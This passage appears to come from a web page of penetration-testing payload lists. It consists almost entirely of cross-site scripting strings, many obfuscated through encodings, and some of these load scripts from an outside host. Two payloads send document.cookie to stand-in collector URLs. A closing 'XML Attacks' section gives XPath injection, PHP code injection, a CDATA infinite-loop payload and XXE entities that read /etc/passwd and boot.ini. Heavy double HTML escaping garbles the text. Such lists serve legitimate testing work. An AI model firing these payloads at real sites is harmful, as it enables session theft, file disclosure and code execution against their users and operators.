&amp;quot;&amp;amp;lt;XML ID=I&amp;amp;gt;&amp;amp;lt;X&amp;amp;gt;&amp;amp;lt;C&amp;amp;gt;&amp;amp;lt;![CDATA[&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;javas]]&amp;amp;gt;&amp;amp;lt;![CDATA[cript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;]]&amp;amp;gt;&amp;amp;lt;/C&amp;amp;gt;&amp;amp;lt;/X&amp;amp;gt;&amp;amp;lt;/xml&amp;amp;gt;&amp;amp;lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&amp;amp;gt;&amp;amp;lt;/SPAN&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;XML ID=&amp;quot;&amp;quot;xss&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;I&amp;amp;gt;&amp;amp;lt;B&amp;amp;gt;&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;javas&amp;amp;lt;!-- --&amp;amp;gt;cript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/B&amp;amp;gt;&amp;amp;lt;/I&amp;amp;gt;&amp;amp;lt;/XML&amp;amp;gt;&amp;amp;lt;SPAN DATASRC=&amp;quot;&amp;quot;#xss&amp;quot;&amp;quot; DATAFLD=&amp;quot;&amp;quot;B&amp;quot;&amp;quot; DATAFORMATAS=&amp;quot;&amp;quot;HTML&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SPAN&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;XML SRC=&amp;quot;&amp;quot;xsstest.xml&amp;quot;&amp;quot; ID=I&amp;amp;gt;&amp;amp;lt;/XML&amp;amp;gt;&amp;amp;lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&amp;amp;gt;&amp;amp;lt;/SPAN&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;HTML&amp;amp;gt;&amp;amp;lt;BODY&amp;amp;gt;&amp;amp;lt;?xml:namespace prefix=&amp;quot;&amp;quot;t&amp;quot;&amp;quot; ns=&amp;quot;&amp;quot;urn:schemas-microsoft-com:time&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;?import namespace=&amp;quot;&amp;quot;t&amp;quot;&amp;quot; implementation=&amp;quot;&amp;quot;#default#time2&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;t:set attributeName=&amp;quot;&amp;quot;innerHTML&amp;quot;&amp;quot; to=&amp;quot;&amp;quot;XSS&amp;amp;lt;SCRIPT DEFER&amp;amp;gt;alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/BODY&amp;amp;gt;&amp;amp;lt;/HTML&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.jpg&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;!--#exec cmd=&amp;quot;&amp;quot;/bin/echo '&amp;amp;lt;SCR'&amp;quot;&amp;quot;--&amp;amp;gt;&amp;amp;lt;!--#exec cmd=&amp;quot;&amp;quot;/bin/echo 'IPT SRC=http://ha.ckers.org/xss.js&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;'&amp;quot;&amp;quot;--&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;? echo('&amp;amp;lt;SCR)';echo('IPT&amp;amp;gt;alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)&amp;amp;lt;/SCRIPT&amp;amp;gt;');&amp;amp;nbsp;?&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;META HTTP-EQUIV=&amp;quot;&amp;quot;Set-Cookie&amp;quot;&amp;quot; Content=&amp;quot;&amp;quot;USERID=&amp;amp;lt;SCRIPT&amp;amp;gt;alert('XSS')&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;HEAD&amp;amp;gt;&amp;amp;lt;META HTTP-EQUIV=&amp;quot;&amp;quot;CONTENT-TYPE&amp;quot;&amp;quot; CONTENT=&amp;quot;&amp;quot;text/html; charset=UTF-7&amp;quot;&amp;quot;&amp;amp;gt; &amp;amp;lt;/HEAD&amp;amp;gt;+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT a=&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&amp;quot; SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT =&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&amp;quot; SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT a=&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&amp;quot; '' SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT &amp;quot;&amp;quot;a='&amp;amp;gt;'&amp;quot;&amp;quot; SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT a=`&amp;amp;gt;` SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT a=&amp;quot;&amp;quot;&amp;amp;gt;'&amp;amp;gt;&amp;quot;&amp;quot; SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT&amp;amp;gt;document.write(&amp;quot;&amp;quot;&amp;amp;lt;SCRI&amp;quot;&amp;quot;);&amp;amp;lt;/SCRIPT&amp;amp;gt;PT SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://66.102.7.147/&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://1113982867/&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://0x42.0x0000066.0x7.0x93/&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://0102.0146.0007.00000223/&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;h\ntt\tp://6&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;//www.google.com/&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;//google&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://google.com/&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://www.google.com./&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;javascript:document.location='http://www.google.com/'&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://www.gohttp://www.google.com/ogle.com/&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;div onmouseover=&amp;quot;&amp;quot;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;img src=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;input type=&amp;quot;&amp;quot;image&amp;quot;&amp;quot; dynsrc=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;bgsound src=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;amp;{document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);};&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;img src=&amp;amp;amp;{document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);};&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;link rel=&amp;quot;&amp;quot;stylesheet&amp;quot;&amp;quot; href=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;iframe src=&amp;quot;&amp;quot;vbscript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;img src=&amp;quot;&amp;quot;livescript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;a href=&amp;quot;&amp;quot;about:&amp;amp;lt;script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;amp;lt;/script&amp;amp;gt;&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;meta http-equiv=&amp;quot;&amp;quot;refresh&amp;quot;&amp;quot; content=&amp;quot;&amp;quot;0;url=javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;body onload=&amp;quot;&amp;quot;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;div style=&amp;quot;&amp;quot;background-image: url(javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;););&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;div style=&amp;quot;&amp;quot;behaviour: url([link to code]);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;div style=&amp;quot;&amp;quot;binding: url([link to code]);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;div style=&amp;quot;&amp;quot;width: expression(document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;););&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;style type=&amp;quot;&amp;quot;text/javascript&amp;quot;&amp;quot;&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;amp;lt;/style&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;object classid=&amp;quot;&amp;quot;clsid:...&amp;quot;&amp;quot; codebase=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;style&amp;amp;gt;&amp;amp;lt;!--&amp;amp;lt;/style&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);//--&amp;amp;gt;&amp;amp;lt;/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;![CDATA[&amp;amp;lt;!--]]&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);//--&amp;amp;gt;&amp;amp;lt;/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;&amp;amp;lt;script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;amp;lt;/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;img src=&amp;quot;&amp;quot;blah&amp;quot;&amp;quot;onmouseover=&amp;quot;&amp;quot;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;img src=&amp;quot;&amp;quot;blah&amp;amp;gt;&amp;quot;&amp;quot; onmouseover=&amp;quot;&amp;quot;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;div datafld=&amp;quot;&amp;quot;b&amp;quot;&amp;quot; dataformatas=&amp;quot;&amp;quot;html&amp;quot;&amp;quot; datasrc=&amp;quot;&amp;quot;#X&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/div&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;a href=&amp;quot;&amp;quot;javascript#document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;img dynsrc=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;amp;&amp;amp;lt;script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;amp;lt;/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;img src=&amp;quot;&amp;quot;mocha:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;div style=&amp;quot;&amp;quot;binding: url([link to code]);&amp;quot;&amp;quot;&amp;amp;gt; [Mozilla]&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;!-- -- --&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;amp;lt;/script&amp;amp;gt;&amp;amp;lt;!-- -- --&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;xml src=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;xml id=&amp;quot;&amp;quot;X&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;a&amp;amp;gt;&amp;amp;lt;b&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;amp;lt;/script&amp;amp;gt;;&amp;amp;lt;/b&amp;amp;gt;&amp;amp;lt;/a&amp;amp;gt;&amp;amp;lt;/xml&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;[\xC0][\xBC]script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);[\xC0][\xBC]/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;script&amp;amp;gt;alert(&amp;quot;&amp;quot;WXSS&amp;quot;&amp;quot;)&amp;amp;lt;/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;&amp;amp;lt;script&amp;amp;gt;alert(&amp;quot;&amp;quot;WXSS&amp;quot;&amp;quot;);//&amp;amp;lt;&amp;amp;lt;/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;script&amp;amp;gt;alert(document.cookie)&amp;amp;lt;/script&amp;amp;gt;&lt;br /&gt;
'&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;alert(document.cookie)&amp;amp;lt;/script&amp;amp;gt;&lt;br /&gt;
'&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;alert(document.cookie);&amp;amp;lt;/script&amp;amp;gt;&lt;br /&gt;
&amp;quot;%3cscript%3ealert(&amp;quot;&amp;quot;WXSS&amp;quot;&amp;quot;);%3c/script%3e&amp;quot;&lt;br /&gt;
%3cscript%3ealert(document.cookie);%3c%2fscript%3e&lt;br /&gt;
%3Cscript%3Ealert(%22X%20SS%22);%3C/script%3E&lt;br /&gt;
&amp;amp;amp;ltscript&amp;amp;amp;gtalert(document.cookie);&amp;amp;lt;/script&amp;amp;gt;&lt;br /&gt;
&amp;amp;amp;ltscript&amp;amp;amp;gtalert(document.cookie);&amp;amp;amp;ltscript&amp;amp;amp;gtalert&lt;br /&gt;
&amp;amp;lt;xss&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;alert('WXSS')&amp;amp;lt;/script&amp;amp;gt;&amp;amp;lt;/vulnerable&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC='javascript:alert(document.cookie)'&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;javascript:alert('WXSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;javascript:alert('WXSS')&amp;quot;&amp;quot;&amp;quot;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC=JaVaScRiPt:alert('WXSS')&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC=javascript:alert(&amp;quot;WXSS&amp;quot;)&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=`javascript:alert(&amp;quot;&amp;quot;'WXSS'&amp;quot;&amp;quot;)`&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20&amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(&amp;quot;&amp;quot;WXSS&amp;quot;&amp;quot;)&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC=javascript:alert(String.fromCharCode(88,83,83))&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC='javasc&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;jav&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;jav	ascript:alert('WXSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;jav&lt;br /&gt;
ascript:alert('WXSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;jav&lt;br /&gt;
ascript:alert('WXSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;%20&amp;amp;amp;#14;%20javascript:alert('WXSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20DYNSRC=&amp;quot;&amp;quot;javascript:alert('WXSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20LOWSRC=&amp;quot;&amp;quot;javascript:alert('WXSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC='%26%23x6a;avasc%26%23000010ript:a%26%23x6c;ert(document.%26%23x63;ookie)'&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC=javascript:alert('XSS')&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC=&amp;amp;amp;#0000106&amp;amp;amp;#0000097&amp;amp;amp;#0000118&amp;amp;amp;#0000097&amp;amp;amp;#0000115&amp;amp;amp;#0000099&amp;amp;amp;#0000114&amp;amp;amp;#0000105&amp;amp;amp;#0000112&amp;amp;amp;#0000116&amp;amp;amp;#0000058&amp;amp;amp;#0000097&amp;amp;amp;#0000108&amp;amp;amp;#0000101&amp;amp;amp;#0000114&amp;amp;amp;#0000116&amp;amp;amp;#0000040&amp;amp;amp;#0000039&amp;amp;amp;#0000088&amp;amp;amp;#0000083&amp;amp;amp;#0000083&amp;amp;amp;#0000039&amp;amp;amp;#0000041&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC=&amp;amp;amp;#x6A&amp;amp;amp;#x61&amp;amp;amp;#x76&amp;amp;amp;#x61&amp;amp;amp;#x73&amp;amp;amp;#x63&amp;amp;amp;#x72&amp;amp;amp;#x69&amp;amp;amp;#x70&amp;amp;amp;#x74&amp;amp;amp;#x3A&amp;amp;amp;#x61&amp;amp;amp;#x6C&amp;amp;amp;#x65&amp;amp;amp;#x72&amp;amp;amp;#x74&amp;amp;amp;#x28&amp;amp;amp;#x27&amp;amp;amp;#x58&amp;amp;amp;#x53&amp;amp;amp;#x53&amp;amp;amp;#x27&amp;amp;amp;#x29&amp;amp;gt;&lt;br /&gt;
'%3CIFRAME%20SRC=javascript:alert(%2527XSS%2527)%3E%3C/IFRAME%3E&lt;br /&gt;
&amp;quot;&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;document.location='http://cookieStealer/cgi-bin/cookie.cgi?'+document.cookie&amp;amp;lt;/script&amp;amp;gt;&lt;br /&gt;
%22%3E%3Cscript%3Edocument%2Elocation%3D%27http%3A%2F%2Fyour%2Esite%2Ecom%2Fcgi%2Dbin%2Fcookie%2Ecgi%3F%27%20%2Bdocument%2Ecookie%3C%2Fscript%3E&lt;br /&gt;
';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//;alert(String.fromCharCode(88,83,83))//\;alert(String.fromCharCode(88,83,83))//&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;!--&amp;amp;lt;SCRIPT&amp;amp;gt;alert(String.fromCharCode(88,83,83))&amp;amp;lt;/SCRIPT&amp;amp;gt;=&amp;amp;amp;{}&lt;br /&gt;
'';!--&amp;amp;lt;XSS&amp;amp;gt;=&amp;amp;amp;{()}&amp;quot;&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
=== XML Attacks - (Update: 11 August 2009 - Total Statements: 15)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;Statements&lt;br /&gt;
count(/child::node())&lt;br /&gt;
x' or name()='username' or 'x'='y&lt;br /&gt;
&amp;amp;lt;name&amp;amp;gt;','')); phpinfo(); exit;/*&amp;amp;lt;/name&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;![CDATA[&amp;amp;lt;script&amp;amp;gt;var n=0;while(true){n++;}&amp;amp;lt;/script&amp;amp;gt;]]&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;![CDATA[&amp;amp;lt;]]&amp;amp;gt;SCRIPT&amp;amp;lt;![CDATA[&amp;amp;gt;]]&amp;amp;gt;alert('XSS');&amp;amp;lt;![CDATA[&amp;amp;lt;]]&amp;amp;gt;/SCRIPT&amp;amp;lt;![CDATA[&amp;amp;gt;]]&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;lt;![CDATA[&amp;amp;lt;]]&amp;amp;gt;SCRIPT&amp;amp;lt;![CDATA[&amp;amp;gt;]]&amp;amp;gt;alert('XSS');&amp;amp;lt;![CDATA[&amp;amp;lt;]]&amp;amp;gt;/SCRIPT&amp;amp;lt;![CDATA[&amp;amp;gt;]]&amp;amp;gt;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;lt;![CDATA[' or 1=1 or ''=']]&amp;amp;gt;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;!DOCTYPE foo [&amp;amp;lt;!ELEMENT foo ANY&amp;amp;gt;&amp;amp;lt;!ENTITY xxe SYSTEM &amp;quot;&amp;quot;file://c:/boot.ini&amp;quot;&amp;quot;&amp;amp;gt;]&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;amp;xxe;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;!DOCTYPE foo [&amp;amp;lt;!ELEMENT foo ANY&amp;amp;gt;&amp;amp;lt;!ENTITY xxe SYSTEM &amp;quot;&amp;quot;file:////etc/passwd&amp;quot;&amp;quot;&amp;amp;gt;]&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;amp;xxe;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
